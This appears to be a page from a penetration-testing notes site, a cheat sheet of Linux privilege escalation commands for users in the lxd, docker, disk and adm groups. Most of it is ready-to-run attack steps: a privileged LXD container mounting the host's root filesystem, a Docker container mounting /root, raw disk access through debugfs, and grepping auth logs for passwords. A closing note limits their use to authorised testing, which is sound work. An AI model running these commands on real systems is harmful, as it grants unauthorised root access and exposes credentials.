9.Privileged-groups

# LXD/LXC Privilege Escalation

# 1. Check group membership
id

# 2. (If necessary) Download Alpine image
wget <alpine_image_url>
unzip alpine.zip
cd 64-bit\ Alpine/

# 3. (If necessary) Initialize LXD (if not already initialized)
lxd init
(Choose defaults or customize as needed)

# 4. Import Alpine image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

# 5. Create privileged container
lxc init alpine r00t -c security.privileged=true

# 6. Mount host filesystem
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

# 7. Start container and get shell
lxc start r00t
lxc exec r00t /bin/sh

# 8. Access host as root
cd /mnt/root/root
id # Should show root privileges

# Docker Privilege Escalation

# 1. Check group membership
id

# 2. Run privileged Docker container
docker run -v /root:/mnt -it ubuntu

# 3. Access host's root directory
cd /mnt
ls -la # View contents of host's /root

# Disk Group Privilege Escalation

# 1. Check group membership
id

# 2. Identify disk device (e.g., /dev/sda1)
lsblk

# 3. Use debugfs (requires root or sudo for initial mount)
sudo debugfs -w /dev/sda1

# 4. (Inside debugfs) Access filesystem
ls
cat <file_path>
etc.
q (to quit debugfs)

# ADM Group Information Disclosure

# 1. Check group membership
id

# 2. Read log files
ls -la /var/log/
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/apache2/access.log # or nginx logs
# ... and other relevant log files

# Example of reading a specific log file for a specific string
grep "password" /var/log/auth.log

Important Notes:

  • LXD/LXC:

    • You might need to adjust the image name and path based on your setup.

    • If lxd init fails because of bridge configuration, you might need root privileges to configure the bridge.

  • Docker:

    • Ensure Docker is installed and running.

    • The -v option mounts a volume. Adjust the source and destination paths as needed.

  • Disk:

    • debugfs requires caution. Incorrect usage can damage the filesystem.

    • You might need root or sudo privileges to initially mount the device.

  • ADM:

    • Log files can contain sensitive information. Handle them responsibly.

    • Log locations can vary based on installed services.

  • GTFObins:

    • Remember to check GTFObins for updated information and alternative methods.

  • Adaptation:

    • These commands are a starting point. Adapt them to your specific target environment.

  • Security:

    • Use these techniques responsibly and ethically. Only use them on systems you have explicit permission to test.

Previous8.Sudo-rights-abuseNext4.Service-based Privilege Escalation

Last updated